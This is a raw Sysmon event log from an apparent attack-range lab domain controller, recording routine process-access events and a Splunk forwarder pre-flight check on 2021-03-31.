12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.036{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-647D-6064-2F00-00000000AE01}2796NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\pre-flight-checksMD5=52414E13BC571139A78F09588A1364A4,SHA256=3C1F79227940F5C563684E97F96860594D7E76089653064CB910620CB735929B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.002{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.002{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.002{266CAFBE-6481-6064-5F00-00000000AE01}30242732C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6483-6064-7000-00000000AE01}3232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 